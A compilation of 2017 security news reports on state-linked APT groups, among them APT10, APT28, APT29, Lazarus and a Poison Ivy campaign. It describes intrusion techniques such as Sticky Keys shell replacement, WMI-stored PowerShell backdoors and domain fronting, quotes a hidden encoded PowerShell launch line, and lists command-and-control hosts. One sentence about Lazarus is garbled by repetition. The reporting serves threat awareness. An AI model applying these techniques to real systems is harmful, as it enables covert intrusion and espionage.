“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”

Hackers launched spear phishing attacks using messages with weaponized attachments. According to FireEye, at least one person felt victim of the attacks, anyway, FireEye was able to profile the threat actors and track the APTs’ movements.

“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”

China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”


Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs 
APT

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.
According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case, the experts of the company reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.

The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”

Callisto APT group

The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the group, the Callisto APT continues to be active, the experts observed the last malware in February 2016, meanwhile, they continue setting up new phishing infrastructure on weekly bases.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.


Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs
APT

Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper known to be targeting managed service providers (MSPs) worldwide. Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.

Operation Cloud Hopper

The expert gathered evidence that suggests the involvement of the APT10 group and domain registration timing indicates operation were conducted with a China’s time zone.

Operation Cloud Hopper

The attackers used same malware exploited in other attacks attributed to APT10, the Poison Ivy RAT and PlugX malware are the most popular malicious codes in the arsenal of the crew. Experts noticed the group from around mid-2016 started to use once again PlugX, ChChes, Quasar and RedLeaves.

“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”

The Operation Cloud Hopper campaign leveraged on well-researched spear-phishing messages aimed to compromise MSPs.

The hackers used this tactic to obtain legitimate credentials to access the client networks of MPSs and exfiltrate sensitive data.

The attackers aimed to compromise the supply chain to steal intellectual property from the victims.

“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013″ continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”

The Operation Cloud Hopper demonstrates that the APT10 focuses on cyber espionage activity, targeting intellectual property. The author of the report confirmed the APT10 has exfiltrated a high volume of data from multiple victims, exploiting compromised MSP networks.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component on every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


APT29 group used domain fronting to evade detection long before these techniques were widely known
28.3.2017 Securityweek
APT

Experts at FireEye discovered the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.
Security firm FireEye continues to follow APT29 group (aka The Dukes, Cozy Bear and Cozy Duke), on Monday it revealed that the cyber spies have been using a technique called “domain fronting” to make hard the attribution of their attacks.

In December, the Signal development team introduced the ‘domain fronting’ technique to circumvent censorship.

The astonishing news is that the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.

The domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.

APT29 group domain fronting

The domain fronting techniques “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption.” continues the paper.”A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage”

The Domain fronting technique is easy to deploy and use and doesn’t require special activities by network intermediaries.

The APT29 group has used the Domain fronting technique for at least two years, the hackers leveraged the Tor network to communicate with infected machines. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that was specific designed to implement the domain fronting technique and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

APT29 group domain fronting

“APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.” reads the analysis published by FireEye. “This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.”

The attackers installed the Tor client and the Meek plugin on the targeted system by using a PowerShell script and a .bat file.

The APT29 group leveraged the Sticky Keys exploit to replace the legitimate executable with the Windows Command Prompt (cmd.exe) file and gain a shell on the targeted system with SYSTEM-level privileges. In this way, the attackers were able to execute several commands, including adding new accounts.

“The attacker executed the PowerShell script C:\Program Files(x86)\Google\start.ps1 to install the TOR services and implement the “Sticky Keys” exploit. This script was deleted after execution, and was not recovered.” continues the analysis.

The script that executes the Sticky Keys exploit is also used to gain persistence on the target machine, it creates a Windows service named “Google Update.”

“By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.” concluded the analysis.


APT29 Cyberspies Use Domain Fronting to Evade Detection

27.3.2017 securityweek APT
The Russia-linked cyber espionage group known as APT29 has been using a technique called “domain fronting” in an effort to make it more difficult for targeted organizations to identify malicious traffic, FireEye reported on Monday.

Domain fronting is a censorship bypassing technique that involves disguising traffic to make it look as if it’s going to a host allowed by the censor, such as Google, Amazon or CloudFlare. Open Whisper Systems recently implemented the technique to help Signal users in Egypt and the United Arab Emirates bypass government censorship.

According to FireEye, the technique has been used for at least two years by the threat actor APT29, which is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.

APT29 has used the Tor anonymity network to communicate with infected machines, which could be considered suspicious by some defenders. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that implements domain fronting and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

In its attacks, APT29 used a PowerShell script and a .bat file to install the Tor client and the Meek plugin on the targeted system. They leveraged an exploit involving the Sticky Keys accessibility feature, where they replaced the legitimate executable with the Windows Command Prompt (cmd.exe) file. This provides the attacker a shell that they can use to execute commands with SYSTEM-level privileges, including to add or modify accounts.

The script that executes the Sticky Keys exploit also creates a Windows service named “Google Update” to ensure that the backdoor remains even after the system has been rebooted.

“APT29 adopted domain fronting long before these techniques were widely known,” said FireEye’s Matthew Dunwoody. “By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.”


Top German official said Germany blocked Russian APT28 cyber attacks in 2016
27.3.2017 securityaffairs
APT

According to a German top official, Germany warded off two cyber attacks launched by the Russian state actor APT28 group in 2016.
On Friday, a top German official told Reuters that last year Germany warded off two cyber attacks launched by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium)

According to Arne Schoenbohm, president of the Federal Office for Information Security (BSI), the first attack occurred in May 2016, the hackers attempted to create an Internet domain for Chancellor Angela Merkel’s Christian Democratic Union (CDU) party in the Baltic region

The second attack was observed months later, the hackers launched a spear-phishing campaign against German parties in the lower house of parliament, the Bundestag. Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.

“Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.” reported the Reuters agency.

APT28 targets Germany

The U.S. intelligence agencies warned in early this year that Russia was likely to target other European states in the next months, especially France and Germany that are holding major elections.

“Germany remains in danger in the cyber arena since we are highly digitized,” Schoenbohm told Reuters in an interview. “The more we digitize, the more dependent we become on networks, the greater the risk of attack.”

Schoenbohm explained that the German Government has largely invested to improve the security of its networks against cyber attacks. It is conducting an awareness campaign to educate politicians and parties about how to protect their networks.

“We give them advice and help them with certain measures. But in the end, what each party does is its own responsibility,” Schoenbohm said.

The official also added that Germany is sharing information on cyber attacks with other governments targeted by the APT28 group, including United States and France.

In 2015, the APT28 group stole 16 gigabytes of data from the German parliament. In December the APT28 group also targeted the Organization for Security and Cooperation in Europe (OSCE) in December, the organization is a security and human rights watchdog, the attack is part of a cyber espionage operation.

“Schoenbohm said neither of the 2016 attacks targeting Germany – or a string of others he did not detail – was successful, but it was unclear to what extent political parties might have experienced security breaches.” continues the Reuters.

Schoenbohm welcomed work by Merkel’s coalition on a law that would bolster the security posture of the Government. The law will enforce security for a growing number of household Internet-connected appliances that are exposed to cyber attacks.

The diffusion of IoT devices must be accomplished by a significant improvement of their security to keep the owner safe.

“The worst thing that could happen” would be that consumers withdrew from the so-called ‘Internet of Things’ for fear of being hacked, he said. “We want to have a successful digitization.”


Symantec blames North Korean Lazarus APT group for recent attacks on banks
18.3.2017 thehackernews
APT

Further investigation on the attacks against Polish banks allowed Symantec to determine that North Korean Lazarus APT group was behind recent attacks on banks.
According to malware researchers at Symantec, the North Korean APT group Lazarus was likely behind a recent string of cyber attacks against organizations in 31 countries. According to Symantec, the Lazarus APT was behind high-profile attacks on Bangladesh Bank, Sony and South Korea,

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

Experts at Symantec collected evidence demonstrating the Lazarus APT group was behind the campaign that leveraged on a “loader” software used to stage attacks by installing other malicious programs.

“We are reasonably certain” Lazarus behind the attacks, Symantec researcher Eric Chien said in an interview with the Reuters Agency.

Both US and South Korea governments are blaming Pyongyang for the attacks, but the North Korean government has denied allegations it was behind the hacks.

Symantec did not identify the organizations that were targeted in the last wave of attacks, it is not clear is Lazarus APT group has stolen money from the victims.is not clear is Lazarus APT group has stolen money from the victims..is not clear is Lazarus APT group has stolen money from the victims..is not clear is Lazarus APT group has stolen money from the victims.

According to the experts from the security firm, there was a significant escalation of the Lazarus APT group, it used more sophisticated techniques targeting than in previous cyber attacks.

Experts at Symantec analyzed the hacking campaign launched last month by the Lazarus Group. The investigations started after Polish banks had been infected with a sophisticated strain of malware.

Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the Polish Financial Supervision Authority (KNF) “in order to secure evidence.”

Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

At the time, Symantec said it had “weak evidence” to blame the Lazarus APT, but now the data gathered by the experts confirm the involvement of the group.

The malicious code was instructed to infect visitors whose IP address showed they were from 104 specific organizations in 31 countries.

The largest number of victims were in Poland, followed by the United States, and Mexico.

Lazarus APT


New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie
17.3.2017 securityaffairs 
APT

New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie who shared a lot of interesting details about the attack vectors and reverse techniques.
Our travel along the great analysis of a fresh, new insidious APT China campaign.

An ordinary case of phishing?
At the beginning, it seemed always the same story: a Word document probably infected, an ordinary story of phishing and nothing more.

If we check at the top of the long analysis of MalwareMustDie we can see the pictures of an ordinary mail, with the boring, ordinary infected Office Word attachment, nothing new under the sun.

The strange fact was that the suspect document was on a common blog web site like Geocities delivering a multi-layered base64 encoded VBScript script which manually decoded at the first layer have given the resulted below:

Poison Ivy

Figure 1. The VBScript encoded with “powershell.exe” command.

The classical vbscript “createbject” instruction is followed by a Powershell command: “powershell.exe –w hdden –ep bypass –Enc with a long encoded string”

Poweshell? Encoded command? “Bypass” option used for what?

Something not so “ordinary nor boring” rises from the underground of the investigation and here the analysis of MalwarareMustDie starts to become interesting and surprising step after step.

Digging into the details of the functions decoded in the other layers of VBScript in a looping process revealed a complex source code fully executable by Powershell: and we have to admit that following MalwareMustDie in his analysis it’s like riding the roller coaster, the same enjoyment.

Here it is an example of the base 64 manually decoded code that revealed another nested base 64 encoded code. The functions represented in the picture are self-explaining as said in the analysis and it is clear that something dangerous is going on the victim computer.


Figure 2. The VBScript base 64 decoded code.

After different loops decoding base 64 layers the result is clear: beyond the Word attachment document, hidden in the VBScript file, there is a long and dangerous script ready to be executed by Powershell: but “where I have already seen this source code”?

“Copy/Pasting Powersploit/CodeExecution PoC”
The code in the VBScript running the Powershell command is a “copy pasta” of an infamous malware based on Powershell PowerSploit/CodeExecution PoC code which is publicly available on GitHub, same file, extension .ps1.

Here it is the main web page of the exploit with the documentation:

Poison Ivy

Figure 3. The PowerSploit / CodeExecution web page on GitHub.

The documentation of the exploit states: “Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process”. Easy: this is hacking pret-a-porter.

And here we have the first Lesson Learnt of this investigation: how big is the damage to the community of the users keeping the malware code publicly available on GitHub: we will not stress enough repeating how would be important not to have this source code ready to use.

The Shellcode analysis
But let give a look to the Shellcode, because the most important task now is reverse it and understand what is the main purpose of its use, why is injected on the computer victims, which technics and mechanisms adopted for doing what, connecting where. The story is getting exciting!

But again the Shellcode is encoded using base 64: when decoded it appears as reported in the picture below:

Poison Ivy

Figure 4. The Shellcode.

The reverse activity seems to be a long task and again – surprisingly – we discover a great trick from MalwareMustDie in order to compile the shellcode and have an executable file to run safely:

“Saving the shellcode data in the .textsection of the assembly file and the entry point(EP) will be “adjusted” by the compiler during compilation process therefore you can execute this shellcode as a binary PE file. This method is very useful when analysing shellcodes. And by using a Unix environment you can create this PE without risking an infection.”

We report the figure of the adopted process here:

Poison Ivy

Figure 5. How handle the shellcode to build up a useful .exe file

The result of this process is to have a “beautiful” stupid-shellcode.exe file ready to run in order to understand the behaviour for further investigations.

Running the malware discovered the behavior can be discovered: it extracts the information from the victim’s computer calling back its C2 server with the target to perform all the malicious actions. The analysis of the payload behavior has always fascinated and the security researchers can spend days “following the money”.

At the end it is sure we are fronting the famous – or infamous – Poison Ivy.

Poison Ivy Classical Scheme in the field
Running the Shellcode it is possible to observe that it uses a lot of system calls involving DLLs mostly related to the kernel of the system: and at the first stage of trace-assemby of the Shellcode provides a fake process named userint.exe used to inject the malicious code, that is executed in this way.

Here an image from the MalwareMustDie analysis reported above:

Poison Ivy

Figure 6. The fake process userinit.exe created and injected.

The great knowledge in malware by MalwareMustDie rise up in all his strength: he is able to find many elements that can be traced back to Poison Ivy.

The combination of the usage of certain DLL, he says, “is showing a typical pattern of the threat too. Moreover, the date stamped in the MUTEX name is mostly used by Poison Ivy“.

Then other operations are performed by the malware:

creating the file called “Plug1.dat”,
it mades a socket for the further works
querying PC info through “HKEY_LOCAL_MACHINE\SYSTEM\Setup”
Yes, no doubts that is Poison Ivy.

But, where is the C&C server?
The last answer to close the loop is: where is the Command and Control server located?

If we give a look closer to the WS2_32.DLL we see that there are some interesting calls like:

socket(),
gethostbyname()
connect().
These revealed hostname and IP address for the callback to the Command and Control server, which is based in Seul, Korea.

Poison Ivy

Figure 7. C&C server based in Korea.

Network/BGP Information→「61.97.243.15||4766 | 61.97.243.0/24 | KIXS-AS | KR | kisa.or.kr | KRNIC」

But looking to the hostname we see that is web.outlooksysm.net on which is possible to invoke a WHOIS command that gives back, among other info, who is the Registrar: is a company based in Shanghai.

Poison Ivy

Figure 8. Whois of the C&C server of the Poison Ivy malware.

Conclusion
The conclusion is that this APT campaign, which utilized multiple accounts on Geocities Japan, leading to the possibility that there is a larger APT campaign being conducted targeting Mongolian victim is

The information provided here is referred to the MalwareMustDie research and analysis linked above.

This kind of campaign has been renamed “Free Hosting (pivoted) APT PowerSploit Poison Ivy” (FHAPPI) by the gentleman who provided us the translation from the Japanese language, Mr. El Kentaro, making up very F-Happy to learn new methods and techniques.

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


Serious Breach Linked to Chinese APTs Comes to Light

22.2.2017 securityweek APT

Several major organizations may have been affected by a breach suffered by an IT services and software provider. The attack, linked to threat actors believed to be located in China, took place in 2015, but it has only now come to light.

A report published earlier this month by RSA describes Kingslayer, a supply chain attack that apparently targeted system administrators in some large organizations. The attackers breached the systems of a company that offers event log analyzers and replaced a legitimate application and its updates with a backdoored version.

The malicious version of the software was delivered between April 9 and April 25, 2015, and it was downloaded by at least one Windows system administrator working for a defense contractor.

While it’s unclear exactly how many organizations downloaded the backdoored software in the April 9-25 timeframe, RSA said the portal that hosted it had numerous subscribers, including four major telecoms providers, over ten western military organizations, more than two dozen Fortune 500 companies, five major defense contractors, and tens of IT solutions providers, government organizations, banks and universities.

While RSA has not named the company whose systems were compromised, investigative journalist Brian Krebs determined that it was Canada-based Altair Technologies Ltd. The company offers firewall log analyzers, a Windows event monitoring product, and a repository of troubleshooting information related to Windows event log messages (EventID.Net).

The EventID.Net website hosted EvLog, the software hijacked by the attackers. A notice posted on the site on June 2016 provides some details on the incident and recommendations for potentially affected users.

However, as Krebs pointed out, the advisory does not appear to have been shared on social media and there was no link to it from anywhere on the site – a link was added this week after the journalist contacted Altair Technologies. The company told Krebs it had no way of knowing who downloaded the software so potential victims were not notified directly either.

While Altair representatives said they don’t expect large organizations to use the EvLog tool, the company’s main website claims the EventID.Net portal has helped millions of users worldwide. SecurityWeek has reached out to Altair Technologies for clarifications.

RSA pointed out that the defense contractor targeted by Kingslayer was attacked only 11 weeks after the breach of Altair’s systems, which suggests that the attackers may have focused on other targets in those 11 weeks.

Evidence uncovered by RSA suggests that the attack was linked to Shell Crew, aka Deep Panda, and Codoso, aka Sunshop Group. Both Shell Crew and Codoso are advanced persistent threat (APT) groups believed to be operating out of China.

RSA also pointed to similarities with another supply chain attack known as the 2014 Monju incident, which targeted a nuclear facility in Japan. That attack was also linked to China.


Google was aware of Russian APT28 group years before others
16.2.2017 securityweek
APT

Lorenzo Bicchierai from MotherBoard shared an interesting private report about Russian cyber espionage operations conducted by APT28, the document was leaked online by Google.
The report dating 2014 includes information collected by Google on the hacking activities conducted by its hackers.

In October 2014, the security experts at FireEye linked cyber attacks against a number of Eastern European countries to a Russian nation-state actor dubbed ATP28.
The report published by FireEye revealed that the APT28 is behind long-running cyber espionage campaigns that targeted also US defense contractors, European security organizations and Eastern European government entities.

FireEye researchers collected evidence that the APT28 group is linked to the Russian Government, the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”

“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.”

APT28 report 2

The group focused its hacking campaign on targets that would be of interest to Russia, such as the Caucasus region with a focus on Georgia.

It was the beginning of the story, now we used different names to refers the nation state actor, including Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team.

Just a couple of days ago security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian cyberespionage group.

Before the publishing of the report in 2014, several companies were investigating the cyber attacks conducted by the threat actor, including Google of course.

Motherboard “penned a 40-page technical report” on the activities of the APT28 group, a precious document considering that it has never been published before.

“This sort of document, which Motherboard obtained from two independent sources, may be a common sight in the threat intelligence industry, but the public rarely gets to see what such a report from Google looks like.” wrote Lorenzo Bicchierai. “The report draws from one of Google’s most interesting sources of data when it comes to malware and cybersecurity threats: VirusTotal, a public malware repository that the internet giant acquired in 2012.”
The document explicitly refers a couple of malware, the Sofacy and X-Agent, that “are used by a sophisticated state-sponsored group targeting primarily former Soviet republics, NATO members, and other Western European countries.”

This means that Google was informed about the threat years before its public disclosure. Google attributed the attacks to the ATP28 and linked them to the Russian Government much earlier of FireEye, ESET or CrowdStrike.

“It looks like Google researchers were well aware of Sofacy before it was publicly disclosed.”

The title of the document is explicit, “Peering into the Aquarium,” and refers the headquarters of the GRU military intelligence agency, popularly known as “The Aquarium.”

According to the report, the submission share ratio of X-Agent Sofacy in VirusTotaI by country shows that Georgia, Romania, Russia, and Denmark had the highest ratio.


The experts from Google tried to profile the APT28, they noticed that the group used the sophisticated X-Agent only to compromise “high-priority targets.” The nation-state actor made a large use of the Sofacy malware for its wide range campaigns, it has been estimated that Sofacy was three times more common than X-Agent in the wild.

“As a first~stage tool, Sofacy is used relatively indiscriminately against potential targets. X-Agent is reserved for high?priority targets. This is borne out by the data. VirusTotai submissions show that Sofacy was three times more common than X-Agent in the wild, with over 600 distinct samples in the data set.” states the report.

The report includes technical details about APT28 operations, it is interesting to note that the security team at Google was able to identify the threat years before others security firms.


BitDefender found the first MAC OS version of the X-Agent used by the APT28
15.2.2017 securityaffairs
APT

Security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at BitDefender have discovered a MAC OS malware program that’s likely part of the arsenal of the dreaded Russian APT 28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during 2016 Presidential election.X-Agent APT 28

X-Agent APT 28

The researchers believe the group has developed a malware called Sofacy or X-Agent that was associated only with its espionage campaigns.

The experts observed several strains of the X-Agent specifically designed to compromise Windows, Linux, iOS and Android OSs.

Now researchers at Bitdefender have spotted the first version of the X-Agent that was developed to compromise MAC OS systems.

The security firm hasn’t revealed how it has discovered the MAC OS version of the X-Agent, and currently, there is no information on the attack chain.

“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.

The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.

The X-Agent malware is able to load additional modules, it could be used as backdoor or to perform a reconnaissance on the target system by gathering information of hardware and software components of the target host.

In September 2016, Palo Alto researcher Ryan Olson, discovered that Fancy Bear used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.

““The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by PaloAlto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.””

The Komplex malware has numerous similarities with the Carberp trojan, it was improved to gain access on PC and OS X systems and use the same command-and-control server.

The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.

The new MAC OS X-Agent leverages domain names similar to the one used by Komplex Trojan, they only differ for the TLD. The researchers noticed identical project path strings inside both the Komplex and X-Agent samples, a circumstance that suggests the involvement of the same development team.

“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.

Summarizing, the Komplex component discovered in September 2016 has been exclusively used as a downloader and installer for the X-Agent binary.

The investigation is ongoing … stay tuned!


Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs
APT

The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back, the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, intelligence and other institutions.

“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.

The Norway was informed of ongoing attacks by an allied state, it is currently investigating the case, but it is still unclear which was the motivation behind the attack.

“It’s difficult to know what the goal” he added.

Despite legislative elections are scheduled for September 2017, experts believe that the attacks are not linked to the vote.

The APT 29 group is likely interested in the Norway NATO membership, especially in the wake of the Ukraine crisis.

Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.

The Norwegian official confirmed that the APT 29 group has links to the Russian authorities, the hackers area also accused to have interfered with the recent US Presidential Election.

APT 29 group Norway

At the time I was writing it is not clear if the hackers have exfiltrated sensitive information, according to the Verdens Gang (VG), the PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”

According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.

Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.

Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.


China-Linked DragonOK APT Group continues updating tools and tactics
8.1.2017 securityaffairs
APT

The China-linked DragonOK continues updating tools and tactics and targeted entities in various countries, including Russia and Tibet.
It was September 2014, when security researchers at FireEye spotted for the first time the cyber espionage activities of a Chinese state-sponsored group dubbed DragonOK.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seem to work in parallel.

The first team of hackers named Moafee, targeted military and government organizations which were in some way involved in South China sea dispute. The attackers hit different organizations as explained by the researchers at FireEye in a blog post, and appears to operate from the Guangdong Province and hit entities working in the defense industry in the United States.

The second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

DragonOK is back and recently targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education and semiconductor.

While Japan is considered the main target of the APT, hackers also targeted individuals or organizations in Taiwan, Tibet, and Russia.

According to the experts at Palo Alto Networks, one of the malware used by the DragonOK APT was dubbed Sysget and was used to target entities in Taiwan.

